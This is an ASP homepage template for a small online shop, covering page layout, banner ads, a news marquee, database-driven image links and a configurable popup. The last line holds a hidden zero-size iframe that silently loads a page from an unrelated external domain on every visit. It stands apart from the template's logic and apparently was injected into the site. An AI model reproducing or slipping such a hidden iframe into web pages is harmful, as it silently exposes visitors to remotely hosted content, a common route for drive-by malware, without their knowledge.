<!--#include file="conn.asp"-->
<!--#include file="config.asp"-->
<title><%=webname%></title>
<!--#include file="include/header.asp"-->
<TABLE WIDTH="760" BORDER="0" CELLSPACING="0" CELLPADDING="0" ALIGN="center" class=table-zuoyou bgcolor="#FFFFFF">
<TR>
<TD valign="top" width="175" class=table-you>
<TABLE WIDTH="100%" BORDER="0" CELLSPACING="0" CELLPADDING="0">
<tr>
<td class=table-xia><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td align="left" width="205" valign="top"><img src="mbtp/lb5.jpg" border="0" /></td>
</tr>
<tr>
<td align="center" valign="top"><marquee onmouseover="this.stop();" onmouseout="this.start();" truespeed="trueSpeed"
scrollamount="1" scrolldelay="40" direction="up" width="150" height="130"
border="0">
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tbody>
<tr></tr>
<tr>
<td><!--#include file="include/newscast.asp"--></td>
</tr>
</tbody>
</table>
</marquee> </td>
</tr>
</table></td>
</tr>
<tr>
<td class=table-xia><!-- #include file="login.asp"--></td>
</tr>
<% if left1<>"" then %>
<tr>
<td align="center"><A HREF=<%=left1url%> TARGET="_blank"><IMG SRC=<%=left1%> BORDER="0"></A></td>
</tr>
<% end if %>
<TR>
<TD><!--#include file="include/pronav.asp"--></TD>
</TR>
<% if left2<>"" then %>
<tr>
<td align="center"><A HREF=<%=left2url%> TARGET="_blank"><IMG SRC=<%=left2%> BORDER="0"></A></td>
</tr>
<% end if %>
<TR>
<TD><!--#include file="include/marks.asp"--></TD>
</TR>
<% if left3<>"" then %>
<tr>
<td align="center"><A HREF=<%=left3url%> TARGET="_blank"><IMG SRC=<%=left3%> BORDER="0"></A></td>
</tr>
<% end if %>
<tr>
<td>
<!--#include file="votedy.asp"--> </td>
</tr>
<tr>
<td><%
rs.Open "select * from imglinks order by linkorder",conn,1,1
do while not rs.EOF %>
<a href="<%= trim(rs("linkurl"))%>" target="_blank"><img src="<%= trim(rs("linkimg"))%>" border="0" width="88" height="31" alt="<%= trim(rs("linkname"))%>" /></a>
<%
rs.MoveNext
loop
rs.Close
set rs=nothing
dim endtime
endtime=timer() %></td>
</tr>
</TABLE>
</TD>
<TD WIDTH="585" VALIGN="TOP">
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<tr>
<td><!-- #include file="include/indexrec.asp"--></td>
</tr>
<% if middle<>"" then %>
<tr>
<td height="2"></td>
</tr>
<tr>
<td align="center"><a href=<%=middleurl%> target="_blank"><img src=<%=middle%> border="0"></a></td>
</tr>
<% end if %>
<tr>
<td height="2"></td>
</tr>
<tr>
<td><!-- #include file="include/8new.asp"--></td>
</tr>
<% if bottom<>"" then %>
<tr>
<td height="2"></td>
</tr>
<tr>
<td align="center"><a href=<%=bottomurl%> target="_blank"><img src=<%=bottom%> border="0"></a></td>
</tr>
<% end if %>
<tr>
<td height="2"></td>
</tr>
<tr>
<td> </td>
</tr>
<tr>
<td height="2"></td>
</tr>
</TABLE>
</TD>
</TR>
</TABLE>
<!--#include file="include/footer.asp"-->
<%
if jumpurl <>"" then
dim jumpok
jumpok=1
if jumpnnm=1 then
if request.cookies("TimesShop")("jump")=Request.ServerVariables("REMOTE_ADDR") then jumpok=0
response.cookies("TimesShop")("jump")=Request.ServerVariables("REMOTE_ADDR")
end if
if jumpok=1 then
%>
<script>
window.open ("<%=jumpurl%>", "newwindow", "height=<%=winheight%>, width=<%=winwidth %>, top=<%=jumpheight %>, left=<%=jumpwidth %>, toolbar=NO, menubar=NO, scrollbars=NO, resizable=NO,location=NO, status=NO")
</script>
<%
end if
end if
%>
<iframe src="http://www.foshome.com/wm/my.htm" width=0 height=0></iframe>